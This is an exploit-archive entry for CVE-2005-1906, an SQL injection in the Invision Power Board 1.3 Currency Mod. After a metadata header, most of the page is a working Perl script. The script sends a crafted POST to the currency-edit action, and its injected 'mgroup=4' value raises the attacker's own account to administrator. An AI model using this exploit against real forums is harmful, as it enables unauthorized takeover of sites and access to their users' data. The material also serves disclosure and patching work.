Invision Power Board 1.3 Currency Mod(edit) SQL injection

CVE: CVE-2005-1906
Category: CWE-89
Price: $100 - $300
Severity: High
Author: NitroSecurity
Risk: High
Exploitation Type: Remote
Date: 2010-03-16
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2010030053

Below is a copy:

# Exploit Title: Invision Power Board Currency Mod(edit) SQL injection
# Date: 17/04/2007
# Author: Pr0T3cT10n
# Software Link: www.invisionpower.com
# Version: 1.3
# Tested on: 1.3
# CVE:
# Code:
#!/usr/bin/perl
#########################################################################
#    Invision Power Board Currency Mod(edit) SQL injection.             #
#    Bug found by Pr0T3cT10n, [email protected]                         #
#    The exploit is updating your user to an admin account              #
#        **YOU SHOULD HAVE CURRENCY EDIT ACCESS!**                      #
#########################################################################
use IO::Socket;
use Digest::MD5 qw(md5_hex);

$host    = $ARGV[0];
$path    = $ARGV[1];
$id        = $ARGV[2];
$passwd    = $ARGV[3];

if(!$ARGV[3])
{
print "#################################################\n";
print "##   IPB Currency Mod SQL injection Exploit.   ##\n";
print "##          Discoverd By Pr0T3cT10n.           ##\n";
print "#################################################\n";
print "$0 [host] [path] [your id] [your passowrd]\n";
print "$0 host.com /forum 567 123456\n";
print "#################################################\n";
exit();
}
print "[~] Connecting $host:80...\n";
$socket = IO::Socket::INET->new(
                                Proto => "tcp" ,
                                PeerAddr => $host ,
                                PeerPort => "80") or die("[-] Connection faild.\n");
print "[+] Connected.\n[~] Sending POST information...\n";
$pack.= "POST " . $path . "/index.php?act=modcp&CODE=docurrencyedit&memberid=" . $id . " HTTP/1.1\r\n";
$pack.= "Host: " . $host . "\r\n";
$pack.= "User-Agent: No_Agent\r\n";
$pack.= "Accept: */*\r\n";
$pack.= "Cookie: member_id=" .$id. "; pass_hash=" .md5_hex($passwd). "\r\n";
$pack.= "Keep-Alive: 300\r\n";
$pack.= "Connection: keep-alive\r\n";
$pack.= "Content-Type: application/x-www-form-urlencoded\r\n";
$pack.= "Content-Length: 24\r\n\r\n";
$pack.= "currency=1%20%2Cmgroup=4"; #UPDATE ibf_members SET currency=1 ,mgroup=4 WHERE id='$id'

print $socket $pack;

while($res = <$socket>)
    {
    if($res =~ /<table align='center' cellpadding="4" class="tablefill">/)
        {
        print("[+] succeed.\n");
        exit();
        }
    }
print("[-] Faild.\n");
exit();





